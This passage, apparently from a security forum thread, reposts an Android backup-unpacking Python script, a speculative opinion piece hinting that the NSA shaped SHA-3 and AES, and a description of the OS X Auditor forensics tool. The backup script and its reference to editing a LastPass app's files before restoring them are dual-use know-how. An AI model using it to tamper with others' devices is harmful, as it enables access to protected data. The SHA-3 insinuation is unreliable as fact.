Python scripts for easier Android Backup fiddling > BSidesLV: Android Backup [un]packer release | Catch22 (in)security / ChrisJohnRiley
Lastpass Android (Play Store) > https://play.google.com/store/apps/details?id=com.lastpass.lpandroid

Sursa: A sneak peek into Android “Secure” Containers | Catch22 (in)security / ChrisJohnRiley
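For anyone who wants to poke at an adb backup file themselves, here is a minimal Python sketch that turns an unencrypted, compressed .ab file into a plain tar archive. This is the generic, documented unpacking approach, not the author's own scripts, and it assumes an "ANDROID BACKUP" version 1 header with encryption set to "none".

  # Minimal sketch: convert an unencrypted, zlib-compressed "adb backup" file
  # into a plain tar archive. Assumes the standard 4-line text header.
  import sys, zlib

  def ab_to_tar(ab_path, tar_path):
      with open(ab_path, "rb") as f:
          magic = f.readline()                 # b"ANDROID BACKUP\n"
          version = f.readline()               # e.g. b"1\n"
          compressed = f.readline()            # b"1\n" if the body is deflated
          encryption = f.readline()            # b"none\n" for unencrypted backups
          if magic.strip() != b"ANDROID BACKUP" or encryption.strip() != b"none":
              raise ValueError("unsupported or encrypted backup")
          body = f.read()
      if compressed.strip() == b"1":
          body = zlib.decompress(body)
      with open(tar_path, "wb") as out:
          out.write(body)                      # now readable with tar / tarfile

  if __name__ == "__main__":
      ab_to_tar(sys.argv[1], sys.argv[2])      # e.g. backup.ab backup.tar

Once extracted, the tar contains the app's files (including sp/LPandroid.xml in the LastPass case), which is what makes the edit-and-restore trick described above possible.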
  23. What Is SHA-3 Good For?

Cryptographers are excited because NIST have announced the selection of SHA-3. There are various reasons to like SHA-3, perhaps most importantly because it uses a different design from its predecessors, so attacks that work against them are unlikely to work against it. But if I were paranoid, there’d be something else I’d be thinking about: SHA-3 is particularly fast in hardware. So what’s bad about that? Well, in practice, on most platforms, this is not actually particularly useful: it is quite expensive to get data out of your CPU and into special-purpose hardware – so expensive that hardware offload of hashing is completely unheard of. In fact, even more expensive crypto is hardly worth offloading, which is why specialist crypto hardware manufacturers tend to concentrate on the lucrative HSM market, rather than on accelerators, these days.

So, who benefits from high speed hardware? In practice, it mostly seems to be attackers – for example, if I want to crack a large number of hashed passwords, then it is useful to build special hardware to do so. It is notable, at least to the paranoid, that the other recent crypto competition by NIST, AES, was also hardware friendly – but again, in a way useful mostly to attackers. In particular, AES is very fast to key – this is a property that is almost completely useless for defence, but, once more, great if you have some encrypted stuff that you are hoping to crack.

The question is, who stands to benefit from this? Well, there is a certain agency who are building a giant data centre who might just like us all to be using crypto that’s easy to attack if you have sufficient resource, and who have a history of working with NIST. Just sayin’.

Sursa: Links
  24. OS X Auditor – Mac Forensics Tool

September 8th, 2013 Mourad Ben Lakhoua

OS X Auditor is a Python-based computer forensics tool. The tool allows analysts to parse and hash artifacts on the running system or on a copy of a system, so as not to modify the original evidence. The program will look at:

- the kernel extensions
- the system agents and daemons
- the third party's agents and daemons
- the old and deprecated system and third party's startup items
- the users' agents
- the users' downloaded files
- the installed applications

It also extracts:

- the users' quarantined files
- the users' Safari history, downloads, topsites, HTML5 databases and localstore
- the users' Firefox cookies, downloads, formhistory, permissions, places and signons
- the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
- the users' social and email accounts
- the WiFi access points the audited system has been connected to (and tries to geolocate them)

This is in addition to looking for suspicious keywords in the .plist files themselves. It can verify the reputation of each file on Team Cymru's MHR, VirusTotal, Malware.lu or your own local database. You can also aggregate all logs from the following directories into a zipball: /var/log (-> /private/var/log), /Library/logs, and the user's ~/Library/logs.

Finally, the results can be rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep), rendered as an HTML log file or sent to a Syslog server. You can download the tool by following this link.

Sursa: OS X Auditor- Mac Forensics Tool | SecTechno
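To give a rough idea of the kind of artifact hashing the tool performs, here is a small Python sketch that walks a directory (a hypothetical Downloads folder in this example) and hashes each file so the digests can be compared against a local list of known-bad hashes or an online reputation service. The paths and the blacklist are made up for the example; this is not code from OS X Auditor itself.

  # Illustrative only: hash files the way a forensics tool might, then compare
  # the digests against a local set of known-bad hashes.
  import hashlib, os

  def sha256_of(path):
      h = hashlib.sha256()
      with open(path, "rb") as f:
          for chunk in iter(lambda: f.read(1 << 20), b""):
              h.update(chunk)
      return h.hexdigest()

  known_bad = {"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}  # example digest

  downloads = os.path.expanduser("~/Downloads")
  for root, _dirs, files in os.walk(downloads):
      for name in files:
          path = os.path.join(root, name)
          if sha256_of(path) in known_bad:
              print("suspicious:", path)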